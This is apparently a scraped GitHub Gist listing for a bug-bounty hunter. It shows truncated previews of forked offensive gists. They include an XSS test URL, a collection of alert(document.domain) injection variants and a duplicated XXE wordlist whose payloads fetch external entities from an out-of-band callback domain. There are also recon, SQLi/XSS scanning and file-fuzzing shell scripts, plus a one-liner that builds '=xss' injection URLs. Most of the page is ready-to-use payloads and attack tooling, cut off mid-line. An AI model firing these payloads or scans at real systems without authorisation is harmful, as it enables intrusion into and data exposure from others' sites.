http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>
Muhammad Ahsan hunter0x8
hunter0x8
/ allcharacters.txt
Created
July 20, 2021 13:30
— forked from cihanmehmet/allcharacters.txt
allcharacters.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'()*+,-./:;<=>?@[\]^_`{|}~" |
hunter0x8
/ alert.js
Created
May 9, 2021 23:01
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
hunter0x8
/ xxe-payloads.txt
Created
September 15, 2020 03:41
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
hunter0x8
/ xxe-payloads.txt
Created
September 15, 2020 03:41
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
hunter0x8
/ findomain_integration.sh
Created
September 5, 2020 05:17
— forked from Edu4rdSHL/findomain_integration.sh
Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database. | |
| # Usage: | |
| # ./findomain_integration.sh domains_file findomain_config_file - see https://www.github.com/Edu4rdSHL/findomain/tree/master/config_examples | |
| domains_file="$1" | |
| config_file="$2" | |
| total_file="all_external_subdomains.txt" | |
| external_sources() { | |
| local amass_file="amass_output.txt" |
hunter0x8
/ st8out.sh
Last active
October 20, 2021 05:45
— forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
hunter0x8
/ .bash_profile
Created
August 31, 2020 08:36
— forked from dwisiswant0/.bash_profile
SQLi & XSS Vulnerability Scanner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### | |
| # ▶ go get -u github.com/lc/gau | |
| # ▶ go get -u github.com/tomnomnom/qsreplace | |
| # ▶ go get -u github.com/tomnomnom/hacks/kxss | |
| # ▶ go get -u github.com/hahwul/dalfox | |
| # ▶ git clone https://github.com/dwisiswant0/DSSS | |
| ### | |
| gauq() { |
hunter0x8
/ juicy.sh
Created
August 29, 2020 15:26
— forked from incogbyte/juicy.sh
fast juicy files with tomnomnom wordlist and ffuf tool
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| #tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51 | |
| # ffuf tool https://github.com/ffuf/ffuf | |
| # put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to | |
| # /usr/local/bin too.. after that.. execute juicy.sh at any terminal. | |
| # usage bash juicy.sh filename.txt | |
| filename="$1" | |
| while read -r line; do | |
| name="$line" |
hunter0x8
/ find js file one liner
Created
August 26, 2020 08:50
— forked from Spy0x7/find js file one liner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done |
NewerOlder